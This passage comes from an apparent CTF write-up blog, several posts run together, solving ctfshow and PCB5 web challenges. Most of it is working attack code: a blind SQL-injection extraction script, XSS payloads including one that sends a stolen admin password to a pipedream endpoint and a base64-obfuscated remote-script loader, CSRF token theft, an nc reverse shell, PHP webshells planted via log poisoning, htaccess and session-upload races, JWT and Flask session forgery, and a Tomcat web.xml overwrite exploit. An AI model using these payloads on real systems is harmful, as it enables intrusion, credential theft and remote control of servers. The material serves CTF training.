这里建议根据实际题目修改，或者干脆注释掉下面这行来跑所有的表 # if 'flag' not in target_table.lower(): continue print(f"\n--- 步骤 3: 正在挖掘表 [{target_table}] ---") # 1. 获取列名 (应对空格过滤: /**/ , 应对逗号过滤: 使用 join 或其它方式) # 这里使用了 group_concat(column_name) col_len_sql = f"admin' and (select(length(group_concat(column_name)))from(information_schema.columns)where(table_name)='{target_table}')={{}};#" col_name_sql = f"admin' and ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='{target_table}'),{{}},1))&gt;{{}};#" c_len = get_length(col_len_sql) if c_len == 0: print(f"[!] 无法获取表 [{target_table}] 的列名，可能存在其它过滤。") continue columns_str = get_string_threaded(col_name_sql, c_len) column_list = columns_str.split(',') print(f"[+] 发现列: {column_list}") # 2. 提取数据 for col in column_list: print(f"[*] 正在提取 [{target_table}.{col}] 的数据...") # 应对逗号过滤：LIMIT 1 OFFSET 0 替代 LIMIT 0,1 # 应对逗号过滤：SUBSTR(str FROM 1 FOR 1) 替代 SUBSTR(str,1,1) # 注意：substr() 中的 FROM/FOR 语法在某些 SQL 注入环境下更稳健 data_len_sql = f"admin' and (select(length({col}))from({target_table})limit 1 offset 0)={{}};#" # 如果逗号完全被禁，substr 的模板需要改为： # ascii(substr((select({col})from({target_table})limit 1 offset 0)from {} for 1)) &gt; {} data_val_sql = f"admin' and ascii(substr((select({col})from({target_table})limit 1 offset 0),{{}},1))&gt;{{}};#" d_len = get_length(data_len_sql, max_len=200) if d_len: data_val = get_string_threaded(data_val_sql, d_len) print(f"[✔] 结果 -&gt; {data_val}") </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251219114001869-1766372386707-7.png" alt="image-20251219114001869" /></p> <p>CTF{bool_sql_injection_bypass_is_fun}</p> <h1>第六章 XSS攻击与防御</h1> <h2>混合型XSS</h2> <p>先注册一个账号登录，测试发现设置个性签名处存在xss漏洞</p> <p>我们在/profile路由可以发现账密，所以我们只需在管理员点击后访问/profile路由，即可得到管理员账密</p> <p><img src="./../../../public/pcb5-ez_java/image-20251221192638822-1766372386707-5.png" alt="image-20251221192638822" /></p> <p>先保存再点管理员签名</p> <p><img src="./../../../public/pcb5-ez_java/image-20251221192326071-1766372386707-8.png" alt="image-20251221192326071" /></p> <p>这里使用XSS平台 https://xssaq.com/</p> <p><img src="./../../../public/pcb5-ez_java/image-20251221192242576-1766372386707-13.png" alt="image-20251221192242576" /></p> <pre><code>(async () =&gt; { try { const res = await fetch('/profile', { credentials: 'include', method: 'GET' }); const txt = await res.text(); const secret = txt.split('id="upass"')[1].substr(48,45); const headers = new Headers() headers.append("Content-Type", "application/json") const body = { "test": secret } const options = { method: "POST", headers, mode: "cors", body: JSON.stringify(body), } fetch("https://eo1l5fizoguf4j8.m.pipedream.net", options) } catch (e) { console.error(e); } })(); </code></pre> <p>使用 https://pipedream.com/ 进行HTTP带外</p> <p><img src="./../../../public/pcb5-ez_java/image-20251221192206852-1766372386707-9.png" alt="image-20251221192206852" /></p> <p>得到flag</p> <p>ctfshow{532a7097-527b-4b7b-ac6a-0b5bc7dce055}</p> <h2>编码绕过XSS过滤</h2> <p>和上一个基本相同，但是对script和/进行了过滤</p> <p>我们用编写的payload绕过</p> <p><img src="./../../../public/pcb5-ez_java/image-20251221194528108-1766372386707-10.png" alt="image-20251221194528108" /></p> <pre><code>&lt;svg onload=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3hzLnBlL21HZSc7'))&gt; </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251221210310193-1766372386707-11.png" alt="image-20251221210310193" /></p> <p>ctfshow{39311769-5d8b-4f7b-9655-1ee5a4dd6f27}</p> <h1>第七章 请求伪造漏洞（CSRF/SSRF）</h1> <h2>请求伪造漏洞_CSRF</h2> <pre><code>&lt;div class="mb-3"&gt; &lt;label class="form-label"&gt;用户名&lt;/label&gt; &lt;div class="form-control bg-transparent text-light"&gt;test&lt;/div&gt; &lt;/div&gt; &lt;div class="mb-3"&gt; &lt;label class="form-label"&gt;密码&lt;/label&gt; &lt;div id="upass" class="form-control bg-transparent text-light"&gt;******&lt;/div&gt; &lt;/div&gt; </code></pre> <p>这里对密码进行了加密，所以不能通过http外带方式得到管理员账密</p> <p>分析功能，发现多了个修改密码的路由</p> <pre><code>&lt;form method="post" class="mt-3"&gt; &lt;div class="mb-3"&gt; &lt;label class="form-label"&gt;用户名&lt;/label&gt; &lt;input class="form-control form-control-lg bg-transparent text-light" name="username" disabled value="test"&gt; &lt;/div&gt; &lt;div class="mb-3"&gt; &lt;label class="form-label"&gt;新密码&lt;/label&gt; &lt;input type="password" class="form-control form-control-lg bg-transparent text-light" name="password" required&gt; &lt;input type="hidden" name="csrf_token" value="3g4i9_yQLKQaoO_LRR8399tux22pg2S7E-WNWJVuPN4"&gt; &lt;/div&gt; &lt;div class="d-flex justify-content-between align-items-center"&gt; &lt;button class="btn btn-neon btn-lg"&gt;修改&lt;/button&gt; &lt;a class="text-decoration-none text-info" href="/login"&gt;已有账号？登录&lt;/a&gt; &lt;/div&gt; &lt;/form&gt; </code></pre> <p>存在csrf接口验证</p> <p>我们通过xss得到管理员访问同源地址：127.0.0.1:4476</p> <p>我们尝试先不携带csrf_token看看后端是否有验证</p> <pre><code>// 构造表单数据 const formData = new URLSearchParams(); formData.append('password', '123456'); fetch('http://127.0.0.1:4476/modify', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: formData, credentials: 'include' // 重要：自动携带Cookie }).then(response =&gt; { }).catch(error =&gt; { }); </code></pre> <p>我们尝试登录，发现无法利用</p> <p><img src="./../../../public/pcb5-ez_java/image-20251221211843398-1766372386707-12.png" alt="image-20251221211843398" /></p> <p>我们进行二次xss，获取csrf_token，并发给攻击网址</p> <pre><code>fetch('http://127.0.0.1:4476/modify', { credentials: 'include' // 携带Cookie }) .then(r =&gt; r.text()) .then(html =&gt; { // 提取Token const tokenMatch = html.match(/name="csrf_token" value="([^"]*)"/); if (tokenMatch &amp;&amp; tokenMatch[1]) { const token = tokenMatch[1]; const leakUrl = `https://23a82889-f2cd-481f-ac4e-f508f661fb47.challenge.ctf.show/?token=${token}&amp;target=http://127.0.0.1:4476/modify`; window.location.href = leakUrl; } }); </code></pre> <p>攻击网站主要代码</p> <pre><code> &lt;form id="csrfForm" action="{{ target }}" method="POST"&gt; &lt;input type="hidden" name="password" value="123456"&gt; &lt;input type="hidden" name="csrf_token" value="{{ token }}"&gt; &lt;/form&gt; &lt;script&gt; setTimeout(() =&gt; { document.getElementById('csrfForm').submit(); }, 1000); &lt;/script&gt; </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251221205904147-1766372386707-14.png" alt="image-20251221205904147" /></p> <p>成功修改管理员密码</p> <p><img src="./../../../public/pcb5-ez_java/image-20251221205759397-1766372386707-16.png" alt="image-20251221205759397" /></p> <p>ctfshow{d9ddfedb-db4e-4851-8246-4f1fe57e8e72}</p> <h2>最简单的SSRF</h2> <p>strlen($host) &lt;= 5</p> <p><img src="./../../../public/pcb5-ez_java/image-20251221213026485-1766372386707-15.png" alt="image-20251221213026485" /></p> <p>url=http://0/flag.php</p> <h2>SSRF打Redis</h2> <p>工具生成payload</p> <p><img src="./../../../public/pcb5-ez_java/image-20251221214827915-1766372386707-17.png" alt="image-20251221214827915" /></p> <p><img src="./../../../public/pcb5-ez_java/image-20251221222147141-1766372386707-18.png" alt="image-20251221222147141" /></p> <p>flag在 /flaaag</p> <p>ctfshow{10de5bdd-f16b-4b48-bea8-63a28ece6d20}</p> <h1>第八章 文件上传攻击与解析漏洞</h1> <h2>绕过MIME检测上传webshell</h2> <p>这里对Content-Type进行校验</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222081649789-1766372386707-20.png" alt="image-20251222081649789" /></p> <p>得到flag</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222081656860-1766372386707-19.png" alt="image-20251222081656860" /></p> <p>ctfshow{10765e65-dbd4-4316-a487-ed64b4b02109}</p> <h2>htaccess攻击</h2> <p>我们上传.hatccess文件</p> <pre><code>&lt;FilesMatch "1.jpg"&gt; SetHandler application/x-httpd-php &lt;/FilesMatch&gt; </code></pre> <p>然后再上传木马</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222082151684-1766372386707-23.png" alt="image-20251222082151684" /></p> <p>蚁剑连接得到flag</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222082158972-1766372386707-21.png" alt="image-20251222082158972" /></p> <p>ctfshow{4ac6e2a9-bbf3-44c9-acc9-d2a566dfd142}</p> <h2>Exif注释包含恶意代码</h2> <p>使用exiftool将jpg转成这种格式</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222091338839-1766372386707-22.png" alt="image-20251222091338839" /></p> <pre><code>C64File "');select 0x3c3f3d60245f4745545b315d603f3e into outfile '/var/www/html/1.php';--+ </code></pre> <p>上传<img src="./../../../public/pcb5-ez_java/image-20251222091432045-1766372386707-25.png" alt="image-20251222091432045" /></p> <p>在1.php自动生成后门文件</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222091152404-1766372386707-24.png" alt="image-20251222091152404" /></p> <p>ctfshow{2a405738-c872-412b-9f5e-57e422864fb4}</p> <p><img src="./../../../public/pcb5-ez_java/image-20251222092031208.png" alt="image-20251222092031208" /></p> https://origin618.github.io/posts/web%E5%BA%94%E7%94%A8%E5%AE%89%E5%85%A8%E4%B8%8E%E9%98%B2%E6%8A%A4%E4%B8%8A/https://origin618.github.io/posts/web%E5%BA%94%E7%94%A8%E5%AE%89%E5%85%A8%E4%B8%8E%E9%98%B2%E6%8A%A4%E4%B8%8A/Web应用安全与防护（上）Thu, 18 Dec 2025 00:00:00 GMT<h1>第一章 Web安全基础</h1> <h2>Base64编码隐藏</h2> <p>打开题目是一个登录页面，Ctrl+u可以查看题目的加密逻辑</p> <pre><code> &lt;script&gt; document.getElementById('loginForm').addEventListener('submit', function(e) { e.preventDefault(); const correctPassword = "Q1RGe2Vhc3lfYmFzZTY0fQ=="; const enteredPassword = document.getElementById('password').value; const messageElement = document.getElementById('message'); if (btoa(enteredPassword) === correctPassword) { messageElement.textContent = "Login successful! Flag: "+enteredPassword; messageElement.className = "message success"; } else { messageElement.textContent = "Login failed! Incorrect password."; messageElement.className = "message error"; } }); &lt;/script&gt; </code></pre> <p>其中通过<code>btoa</code>方法对提交的密码进行编码，编码后若是与<code>correctPassword</code>相同则登录成功</p> <p>这里我们对<code>Q1RGe2Vhc3lfYmFzZTY0fQ==</code>进行<code>atob</code>解码</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218080907790-1766103420752-1.png" alt="image-20251218080907790" /></p> <p>CTF{easy_base64}</p> <h2>HTTP头注入</h2> <p>同样的加密逻辑但是有后端check.php验证</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218084028413-1766103420752-9.png" alt="image-20251218084028413" /></p> <p>这里直接注入user-agent</p> <p>CTF{user_agent_inject_success}</p> <h2>Base64多层嵌套解码</h2> <pre><code> document.getElementById('loginForm').addEventListener('submit', function(e) { const correctPassword = "SXpVRlF4TTFVelJtdFNSazB3VTJ4U1UwNXFSWGRVVlZrOWNWYzU="; function validatePassword(input) { let encoded = btoa(input); encoded = btoa(encoded + 'xH7jK').slice(3); encoded = btoa(encoded.split('').reverse().join('')); encoded = btoa('aB3' + encoded + 'qW9').substr(2); return btoa(encoded) === correctPassword; } const enteredPassword = document.getElementById('password').value; const messageElement = document.getElementById('message'); if (!validatePassword(enteredPassword)) { e.preventDefault(); messageElement.textContent = "Login failed! Incorrect password."; messageElement.className = "message error"; } }); </code></pre> <p>我们这里通过暴力破解</p> <pre><code>// 在控制台直接运行以下代码 const correctPassword = "SXpVRlF4TTFVelJtdFNSazB3VTJ4U1UwNXFSWGRVVlZrOWNWYzU="; function encrypt(password) { let encoded = btoa(password); encoded = btoa(encoded + 'xH7jK').slice(3); encoded = btoa(encoded.split('').reverse().join('')); encoded = btoa('aB3' + encoded + 'qW9').substr(2); return btoa(encoded); } function bruteForce6Digit() { console.time('Brute Force Time'); // 生成6位数字的优化方法（000000-999999） for (let num = 0; num &lt;= 999999; num++) { // 补零到6位 const candidate = num.toString(); // 加密并比对 if (encrypt(candidate) === correctPassword) { console.timeEnd('Brute Force Time'); return candidate; } // 每10万次输出进度 if (num % 100000 === 0) { console.log(`Progress: ${num/100000}0%`); } } console.timeEnd('Brute Force Time'); return "Not found"; } // 执行破解 console.log("Result:", bruteForce6Digit()); </code></pre> <p>CTF{base64_brute_force_success}</p> <h2>HTTPS中间人攻击</h2> <p>使用sslkey.log进行http流量解密</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218090451767-1766103420753-12.png" alt="image-20251218090451767" /></p> <p>CTF{https_secret_data}</p> <h2>Cookie伪造</h2> <p>弱口令guest/guest登录发现是游客账号</p> <p>我们将role的值改为admin</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218090724755-1766103420752-3.png" alt="image-20251218090724755" /></p> <p>CTF{cookie_injection_is_fun}</p> <h1>第二章 Web木马与命令执行攻击</h1> <h2>一句话木马变形</h2> <p>输入phpinfo();查看php版本为7.3.29</p> <p>经过测试发现过滤了空格和单双引号</p> <p>我们利用base64加密进行绕过</p> <p><code>eval(base64_decode(c3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs));</code></p> <p><img src="./../../../public/pcb5-ez_java/image-20251218091928443-1766103420752-2.png" alt="image-20251218091928443" /></p> <p>CTF{shell_code_base64_bypass}</p> <h2>反弹shell构造</h2> <p>题目构造命令</p> <pre><code>nc 127.0.0.1 8001 -e /bin/sh </code></pre> <p>服务器nc -lvnp 8001</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218163424072-1766103420752-4.png" alt="image-20251218163424072" /></p> <p>CTF{reverse_shell_use_nc}</p> <h2>管道符绕过过滤</h2> <p>|grep flag|xargs tac</p> <p>或者使用<code>||</code> 让第一个命令执行失败</p> <p>1||tac flag.php</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218164224056-1766103420752-6.png" alt="image-20251218164224056" /></p> <p>CTF{no_space_to_execute_shell_commands}</p> <h2>无字母数字代码执行</h2> <pre><code>&lt;?php $system="system"; $command="tac flag.php"; echo '(~'.urlencode(~$system).')(~'.urlencode(~$command).');'; ?&gt; </code></pre> <p>得到flag</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218200150510-1766103420752-5.png" alt="image-20251218200150510" /></p> <p>CTF{no_characters_to_execute_php_code}</p> <h2>无字母数字命令执行</h2> <pre><code>import requests import time url = "http://localhost:5058" #payload.txt 内容为需要执行的命令 这里为 tac /var/www/html/flag.php file = {"file": open("payload.txt", "r")} data = {"code": ". /???/????????[@-[]"} while True: response = requests.post(url, files=file, data=data ,verify=False) if response.text.find("CTF{")!= -1: flag = response.text[response.text.find("CTF{"):-1] print(flag) break else: print("Waiting for flag...") time.sleep(1) </code></pre> <p>CTF{no_characters_to_execute_shell_commands_he3e}</p> <h1>第三章 文件包含与路径遍历漏洞</h1> <h2>日志文件包含</h2> <p>使用php伪协议会被过滤</p> <p>用log文件包含：/var/log/nginx/access.log</p> <p>可以正常包含<img src="./../../../public/pcb5-ez_java/image-20251218201949837-1766103420752-7.png" alt="image-20251218201949837" /></p> <p>在ua注入木马&lt;?php eval($_POST[1]);?&gt;(注意得一次写对，不然会报错)</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218202112142-1766103420752-10.png" alt="image-20251218202112142" /></p> <p>执行命令得到flag</p> <p>CTF{php_access_l0g_lf1_is_fun}</p> <h2>php://filter读取源码</h2> <p>使用php://filter/convert.base64-encode/resource=index.php读取源码</p> <pre><code>&lt;?php if ($_SERVER['REQUEST_METHOD'] === 'POST' &amp;&amp; isset($_POST['file'])): ?&gt; &lt;div class="form-group"&gt; &lt;label&gt;Include Result:&lt;/label&gt; &lt;div class="result"&gt;&lt;?php include "db.php"; function validate_file_contents($file) { if(preg_match('/[^a-zA-Z0-9\/\+=]/', $file)){ return false; } return true; } try { // Validate input characters if (preg_match('/log|nginx|access/', $_POST['file'])) { throw new Exception('Invalid input. Please enter a valid file path.'); } ob_start(); echo file_get_contents($_POST['file']); $output = ob_get_clean(); if(!validate_file_contents($output)){ throw new Exception('Invalid input. Please enter a valid file path.'); }else{ echo 'File contents:'; echo '&lt;br&gt;'; echo $output; } } catch (Exception $e) { echo 'Error: ' . htmlspecialchars($e-&gt;getMessage()); } ?&gt;&lt;/div&gt; &lt;/div&gt; &lt;?php endif; ?&gt; </code></pre> <p>可以看出日志方法被过滤</p> <p>用同样方法读取db.php</p> <p>PD9waHAKCiRzZXJ2ZXJuYW1lID0gImxvY2FsaG9zdCI7CiR1c2VybmFtZSA9ICJyb290IjsKJHBhc3N3b3JkID0gIkNURnszZWNyZXRfcGFzc3cwcmRfaGVyZX0iOwokZGJuYW1lID0gImJvb2tfc3RvcmUiOw==</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218202742761-1766103420752-8.png" alt="image-20251218202742761" /></p> <p>CTF{3ecret_passw0rd_here}</p> <h2>远程文件包含（RFI）</h2> <p>读取/etc/passwd正常，var/log和伪协议被禁</p> <p>这里使用远程文件包含</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218204511531-1766103420752-11.png" alt="image-20251218204511531" /></p> <p>得到flag:CTF{http_rfi_1s_fun}</p> <h2>路径遍历突破</h2> <pre><code>&lt;?php if (isset($_GET['path']) &amp;&amp; $_GET['path'] !== '') { $path = $_GET['path']; if(preg_match('/data|log|access|pear|tmp|zlib|filter|:/', $path) ){ echo '&lt;span style="color:#f00;"&gt;禁止访问敏感目录或文件&lt;/span&gt;'; exit; } #禁止以/或者../开头的文件名 if(preg_match('/^(\.|\/)/', $path)){ echo '&lt;span style="color:#f00;"&gt;禁止以/或者../开头的文件名&lt;/span&gt;'; exit; } echo $path."内容为：\n"; echo str_replace("\n", "&lt;br&gt;", htmlspecialchars(file_get_contents($path))); } else { echo '&lt;span style="color:#888;"&gt;目标flag文件为/flag.txt&lt;/span&gt;'; } ?&gt; </code></pre> <p>代码只限制了开头不能为.或/，所以我们用折叠目录来绕过</p> <p>1/../../../../../../flag.txt</p> <p>CTF{file_path_bypass_is_fun}</p> <h2>临时文件包含</h2> <p>伪协议和日志包含被过滤，打开网站后发现有cookie，说明开启了session</p> <p>我们用临时文件上传配合session包含来getshell</p> <pre><code>import requests import threading import urllib3 # 1. 屏蔽 InsecureRequestWarning 警告（如果不屏蔽，控制台会刷屏警告信息） urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) session = requests.session() # 2. 全局设置：该 session 发起的所有请求都不验证 SSL session.verify = False sess = 'ctfshow' url = "https://6db8736e-df43-471d-a71d-41320d903877.challenge.ctf.show/" data1 = { 'PHP_SESSION_UPLOAD_PROGRESS': '&lt;?php echo "success";file_put_contents("/var/www/html/1.php","&lt;?php eval(\\$_POST[1]);?&gt;");?&gt;' } file = { 'file': 'ctfshow' } cookies = { 'PHPSESSID': sess } def write(): while True: # 已经在 session 中设置了 verify=False，这里不需要额外写 r = session.post(url, data=data1, files=file, cookies=cookies) def read(): while True: r = session.get(url + "?path=/tmp/sess_ctfshow", cookies=cookies) if 'success' in r.text: print("shell 地址为：" + url + "1.php") # 在多线程中直接 exit() 可能会报些小错，建议使用 os._exit(0) import os os._exit(0) threads = [threading.Thread(target=write), threading.Thread(target=read)] for t in threads: t.start() </code></pre> <p><img src="./../../../public/pcb5-ez_java/image-20251218210037263-1766103420753-13.png" alt="image-20251218210037263" /></p> <p>CTF{fileupload_temp_file_include_success}</p> <h1>第四章 用户认证与会话安全</h1> <h2>Session固定攻击</h2> <p>这题不用写脚本也行，当练习写脚本了</p> <pre><code>import requests from bs4 import BeautifulSoup BASE = 'http://localhost:5055' # 1. 攻击者用test/test登录，获得sessionid sess = requests.Session() sess.get(BASE + '/login') resp = sess.post(BASE + '/login', data={'username': 'test', 'password': 'test'}) sessionid = sess.cookies.get('session') print('[*] Got sessionid:', sessionid) # 2. 发送站内信，附带sessionid msg = 'hello admin' sess.post(BASE + '/message', data={'msg': msg, 'sessionid': sessionid}) print('[*] Sent message to admin with sessionid') # 3. 等待admin_bot处理（可sleep几秒） import time time.sleep(11) # 4. 用同样的sessionid访问首页，应该已变为admin权限 sess2 = requests.Session() sess2.cookies.set('session', sessionid) resp = sess2.get(BASE + '/') soup = BeautifulSoup(resp.text, 'html.parser') flag = soup.find('h3') if flag: print('[+] FLAG:', flag.text) else: print('[-] Exploit failed') print(resp.text) </code></pre> <p>CTF{ctfshow_session_fixation_is_a_common_web_security_vulnerability}</p> <h2>JWT令牌伪造</h2> <pre><code>import base64 import requests import json def b64url_encode(data): return base64.urlsafe_b64encode(data).rstrip(b'=').decode() url = "https://7dca1591-addf-4984-826e-90ffab4176b4.challenge.ctf.show/" # 构造伪造的 JWT header = {"alg": "none", "typ": "JWT"} payload = {"user": "admin", "admin": True} header_b64 = b64url_encode(json.dumps(header).encode()) payload_b64 = b64url_encode(json.dumps(payload).encode()) # none算法下，签名部分可以为空 jwt_token = f"{header_b64}.{payload_b64}." # 携带伪造的 token 访问首页 cookies = {"token": jwt_token} resp = requests.get(url, cookies=cookies) if "CTF{" in resp.text: print("Flag found!") start = resp.text.find("CTF{") end = resp.text.find("}", start) print(resp.text[start:end+1]) else: print("Flag not found. Response:") print(resp.text) </code></pre> <p>也可以用在线网站做</p> <p>CTF{jwt_none_alg_bypass_success}</p> <h2>Flask_Session伪造</h2> <p>读取执行路径url=file:///proc/self/cmdline</p> <p>得到python/app/app.py，读取源码</p> <pre><code># encoding:utf-8 import re, random, uuid, urllib.request from flask import Flask, session, request app = Flask(__name__) random.seed(uuid.getnode()) app.config['SECRET_KEY'] = str(random.random()*100) print(app.config['SECRET_KEY']) app.debug = False @app.route('/') def index(): session['username'] = 'guest' return 'CTFshow 网页爬虫系统 &lt;a href="/read?url=https://baidu.com"&gt;读取网页&lt;/a&gt;' @app.route('/read') def read(): try: url = request.args.get('url') if re.findall('flag', url, re.IGNORECASE): return '禁止访问' res = urllib.request.urlopen(url) return res.read().decode('utf-8', errors='ignore') except Exception as ex: print(str(ex)) return '无读取内容可以展示' @app.route('/flag') def flag(): if session.get('username') == 'admin': return open('/flag.txt', encoding='utf-8').read() else: return '访问受限' if __name__=='__main__': app.run( debug=False, host="0.0.0.0" ) </code></pre> <p>使用下面脚本获取随机数</p> <pre><code>import requests import random import urllib3 # 禁用安全警告（如果不禁用，verify=False 会报一堆红色警告，但不影响运行） urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) url = "https://4ad16589-49c7-4621-a1c2-c94455211830.challenge.ctf.show/" def get_randStr(): # 添加 verify=False 绕过 SSL 验证 response = requests.get(url + "read?url=file:///sys/class/net/eth0/address", verify=False) mac = response.text.strip() print(f"获取到的 MAC: {mac}") # 打印一下确保读到了 temp = mac.split(':') temp = [int(i,16) for i in temp] temp = [bin(i).replace('0b','').zfill(8) for i in temp] temp = ''.join(temp) mac_int = int(temp,2) random.seed(mac_int) randStr = str(random.random()*100) return randStr if __name__ == '__main__': randStr = get_randStr() print("Calculated SECRET_KEY:", randStr) </code></pre> <p>得到： 获取到的 MAC: 02:42:ac:0c:d7:c2 Calculated SECRET_KEY: 76.13415785899355</p> <p>使用https://github.com/noraj/flask-session-cookie-manager进行伪造</p> <p>python flask_session_cookie_manager3.py encode -t "{'username':'admin'}" -s "76.13415785899355"</p> <p>得到eyJ1c2VybmFtZSI6ImFkbWluIn0.aUQHxw.cqE7qyE4BeQP2ySeezjgbPoLpQk</p> <p>修改本地的cookie值然后访问/flag路由</p> <p><img src="./../../../public/pcb5-ez_java/image-20251218215853491-1766103420753-14.png" alt="image-20251218215853491" /></p> <p>得到flag:CTF{flask_session_is_secure}</p> <h2>弱口令爆破</h2> <p>用给的字典直接爆破密码</p> <p><img src="./../../../public/pcb5-ez_java/image-20251219081020268-1766103420753-15.png" alt="image-20251219081020268" /></p> <p>得到flag</p> <p><strong>CTF{this_is_a_sample_flag}</strong></p> https://origin618.github.io/posts/pcb5-2025-web/https://origin618.github.io/posts/pcb5-2025-web/pcb-2025-webMon, 15 Dec 2025 00:00:00 GMT<h1>pcs5-ez_java</h1> <p>打开示例又是一个登录框，admin被占用就用Admin注册</p> <p>成功登录</p> <p>根据前面题目的经验，打开cookie发现是jwt编码</p> <p><img src="../../../public/pcb5-ez_java/image1-1765879704414-14-1765879840107-2.png" alt="image1" /></p> <p>将Admin改为admin编码</p> <p><code>eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTc2NTYyMjE4M30.uqlZpRIPHzHnA45-ddAwJwLT1Ga6an55bsBk2tMlvckXWETrXM3jM5jrG4kKdI-zFhn6GOVUQCV1IkdDlFwsrQ</code></p> <p>奇怪的来了，后台显示未经授权</p> <p><img src="../../../public/pcb5-ez_java/image2-1765879840107-3.png" alt="image2" /></p> <p>好在这里报错爆出了apache服务器和版本Apache Tomcat/9.0.108</p> <p>根据提示</p> <blockquote> <p>RewriteCond %{QUERY_STRING} (^|&amp;)path=([^&amp;]+) RewriteRule ^/download$ /%2 [B,L]</p> </blockquote> <p>发现这里存在<code>CVE-2025-55752</code>，也就是<code>Apache Tomcat RewriteValve目录遍历漏洞</code></p> <p>https://blog.csdn.net/AKM4180/article/details/154134981</p> <p>访问web.xml文件：<code>/download?path=%2fWEB-INF%2fweb.xml</code>，得到</p> <p><img src="../../../public/pcb5-ez_java/image3-1765879725336-19-1765879840107-4.png" alt="image3" /></p> <p>这里有好几个servlet，我们先读取AdminDashboardServlet</p> <p>http://192.168.18.25:25004/download?path=%2FWEB-INF%2Fclasses%2Fcom%2Fctf%2FBackUpServlet.class</p> <p>得到一个download，将源码反编译得到</p> <p><img src="../../../public/pcb5-ez_java/image4-1765879729406-21-1765879840107-5.png" alt="image4" /></p> <p>其中<code>validateAdmin</code>方法存在逻辑漏洞：</p> <pre><code> static boolean validateAdmin(HttpServletRequest req, HttpServletResponse resp) throws IOException { Cookie[] cookies = req.getCookies(); if (cookies != null) { for(Cookie cookie : cookies) { if ("jwt".equals(cookie.getName())) { String value = cookie.getValue(); String username = JwtUtil.validateToken(value); if (username == null) { resp.sendError(401); return false; } if (username.compareTo("admin") != 0) { resp.sendError(401); return false; } } } } resp.setContentType("application/json;charset=UTF-8"); return true; } </code></pre> <p>这段代码代表当<strong>不携带任何 Cookie</strong> 时，将会执行<code>return true</code>操作，也就是不携带cookie即可访问<code>/admin/</code>路由下所有接口</p> <p>浏览器并未开启jsp解析服务，所以我们要上传包含<code>JspServlet</code>的恶意<code>web.xml</code>配置，覆盖带原有<code>WEB-INF/web.xml</code>，使服务器能够解析我们的恶意jsp文件（webshell)</p> <p>其中<code>renameFile</code>方法的<code>getCanonicalFile</code>对文件路径进行检测，解析掉所有的"."和".."</p> <pre><code>File base = (new File(this.getServletContext().getRealPath(resourceDir))).getCanonicalFile(); </code></pre> <p>所以我们需要将resourceDir设置为"."，然后通过<code>/admin/rename</code>将上传的恶意web.xml改为WEB-INF/web.xml</p> <p>Tomcat检测到新的web.xml会自动重载应用，上传我们的jsp webshell即可执行命令</p> <pre><code>import requests import time import sys # ================= 配置区域 ================= URL = "http://192.168.18.25:25004" CMD_TO_EXECUTE = "cat /flag" # 获取 flag 的命令 PROXY = None # {"http": "http://127.0.0.1:8080"} # 如果需要 Burp 调试，取消注释 # ================= Payload 构造 ================= # 1. 恶意的 web.xml (修正版：包含原有业务配置) # 作用：在保留原有上传/管理功能的基础上，强行开启 JSP 解析 MALICIOUS_WEB_XML = """&lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0"&gt; &lt;servlet&gt; &lt;servlet-name&gt;jsp&lt;/servlet-name&gt; &lt;servlet-class&gt;org.apache.jasper.servlet.JspServlet&lt;/servlet-class&gt; &lt;init-param&gt; &lt;param-name&gt;fork&lt;/param-name&gt; &lt;param-value&gt;false&lt;/param-value&gt; &lt;/init-param&gt; &lt;init-param&gt; &lt;param-name&gt;xpoweredBy&lt;/param-name&gt; &lt;param-value&gt;false&lt;/param-value&gt; &lt;/init-param&gt; &lt;load-on-startup&gt;3&lt;/load-on-startup&gt; &lt;/servlet&gt; &lt;servlet-mapping&gt; &lt;servlet-name&gt;jsp&lt;/servlet-name&gt; &lt;url-pattern&gt;*.jsp&lt;/url-pattern&gt; &lt;/servlet-mapping&gt; &lt;servlet&gt; &lt;servlet-name&gt;LoginServlet&lt;/servlet-name&gt; &lt;servlet-class&gt;com.ctf.LoginServlet&lt;/servlet-class&gt; &lt;/servlet&gt; &lt;servlet&gt; &lt;servlet-name&gt;RegisterServlet&lt;/servlet-name&gt; &lt;servlet-class&gt;com.ctf.RegisterServlet&lt;/servlet-class&gt; &lt;/servlet&gt; &lt;servlet&gt; &lt;servlet-name&gt;DashboardServlet&lt;/servlet-name&gt; &lt;servlet-class&gt;com.ctf.DashboardServlet&lt;/servlet-class&gt; &lt;multipart-config&gt; &lt;max-file-size&gt;10485760&lt;/max-file-size&gt; &lt;max-request-size&gt;20971520&lt;/max-request-size&gt; &lt;file-size-threshold&gt;0&lt;/file-size-threshold&gt; &lt;/multipart-config&gt; &lt;/servlet&gt; &lt;servlet&gt; &lt;servlet-name&gt;AdminDashboardServlet&lt;/servlet-name&gt; 